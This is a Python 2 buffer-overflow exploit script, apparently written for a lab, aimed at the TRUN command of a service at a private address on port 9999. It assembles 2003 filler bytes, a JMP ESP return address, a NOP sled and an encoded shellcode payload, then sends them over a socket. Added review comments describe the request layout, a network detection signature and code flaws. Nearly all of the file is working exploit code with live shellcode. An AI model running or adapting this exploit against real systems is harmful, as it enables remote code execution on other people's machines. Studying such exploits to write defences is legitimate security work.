#!/usr/bin/python2
#did the above because this script wasn't working in python3
#fix for python3 later
import sys, socket
# Flat script: assembles one fixed-layout request (filler, four address
# bytes, a NOP run, then an opaque byte string) and sends it once to a
# hard-coded host/port over a TCP socket. Python 2 only, per the header.
#
# Opaque byte-string literal sent as the tail of the request. The page does
# not document what these bytes do; only the file name suggests their role.
# From a review standpoint treat them as unknown, untrusted code.
payload = (
"\xbf\xc5\xba\x9a\xe9\xda\xca\xd9\x74\x24\xf4\x5d\x2b\xc9"
"\xb1\x52\x31\x7d\x12\x83\xc5\x04\x03\xb8\xb4\x78\x1c\xbe"
"\x21\xfe\xdf\x3e\xb2\x9f\x56\xdb\x83\x9f\x0d\xa8\xb4\x2f"
"\x45\xfc\x38\xdb\x0b\x14\xca\xa9\x83\x1b\x7b\x07\xf2\x12"
"\x7c\x34\xc6\x35\xfe\x47\x1b\x95\x3f\x88\x6e\xd4\x78\xf5"
"\x83\x84\xd1\x71\x31\x38\x55\xcf\x8a\xb3\x25\xc1\x8a\x20"
"\xfd\xe0\xbb\xf7\x75\xbb\x1b\xf6\x5a\xb7\x15\xe0\xbf\xf2"
"\xec\x9b\x74\x88\xee\x4d\x45\x71\x5c\xb0\x69\x80\x9c\xf5"
"\x4e\x7b\xeb\x0f\xad\x06\xec\xd4\xcf\xdc\x79\xce\x68\x96"
"\xda\x2a\x88\x7b\xbc\xb9\x86\x30\xca\xe5\x8a\xc7\x1f\x9e"
"\xb7\x4c\x9e\x70\x3e\x16\x85\x54\x1a\xcc\xa4\xcd\xc6\xa3"
"\xd9\x0d\xa9\x1c\x7c\x46\x44\x48\x0d\x05\x01\xbd\x3c\xb5"
"\xd1\xa9\x37\xc6\xe3\x76\xec\x40\x48\xfe\x2a\x97\xaf\xd5"
"\x8b\x07\x4e\xd6\xeb\x0e\x95\x82\xbb\x38\x3c\xab\x57\xb8"
"\xc1\x7e\xf7\xe8\x6d\xd1\xb8\x58\xce\x81\x50\xb2\xc1\xfe"
"\x41\xbd\x0b\x97\xe8\x44\xdc\x58\x44\x46\x72\x31\x97\x46"
"\x9b\x9d\x1e\xa0\xf1\x0d\x77\x7b\x6e\xb7\xd2\xf7\x0f\x38"
"\xc9\x72\x0f\xb2\xfe\x83\xde\x33\x8a\x97\xb7\xb3\xc1\xc5"
"\x1e\xcb\xff\x61\xfc\x5e\x64\x71\x8b\x42\x33\x26\xdc\xb5"
"\x4a\xa2\xf0\xec\xe4\xd0\x08\x68\xce\x50\xd7\x49\xd1\x59"
"\x9a\xf6\xf5\x49\x62\xf6\xb1\x3d\x3a\xa1\x6f\xeb\xfc\x1b"
"\xde\x45\x57\xf7\x88\x01\x2e\x3b\x0b\x57\x2f\x16\xfd\xb7"
"\x9e\xcf\xb8\xc8\x2f\x98\x4c\xb1\x4d\x38\xb2\x68\xd6\x58"
"\x51\xb8\x23\xf1\xcc\x29\x8e\x9c\xee\x84\xcd\x98\x6c\x2c"
"\xae\x5e\x6c\x45\xab\x1b\x2a\xb6\xc1\x34\xdf\xb8\x76\x34"
"\xca")
# Filler: 2003 bytes of 0x41, the length the author's comment calls the offset.
padding = "A" * 2003 #offset = 2003
# Four bytes that follow the filler. The author's comment names the address
# 0x625011af; the literal is that value written in little-endian byte order.
eip = "\xaf\x11\x50\x62" #0x625011af contains JMP ESP
# 32 bytes of 0x90 placed between the address bytes and the opaque payload.
nopsled = "\x90" * 32
# Request tail in fixed order: filler, address bytes, NOP run, payload.
overflow = padding + eip + nopsled + payload
# NOTE(review): host and port are hard-coded; the author's own inline
# comment says they could become parameters.
# Detection note: the on-wire shape is distinctive -- the ASCII prefix
# 'TRUN /.:/' followed by a ~2 KB run of 0x41 and then a run of 0x90 --
# which is what a network signature or a service-side length check on the
# TRUN argument would key on.
try:
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(('192.168.0.111',9999)) #could make these input variables later
    s.send(('TRUN /.:/' + overflow))
    s.close()
# NOTE(review): the bare except catches every exception raised in the block
# (including the Python 3 failure the file header mentions) and reports all
# of them as a connection error, so the real cause is lost. s.close() is
# also skipped whenever connect() or send() raises, leaving the socket open
# until garbage collection; a try/finally or `with` would close it on both
# paths.
except:
    print "Error connecting to server"
    sys.exit()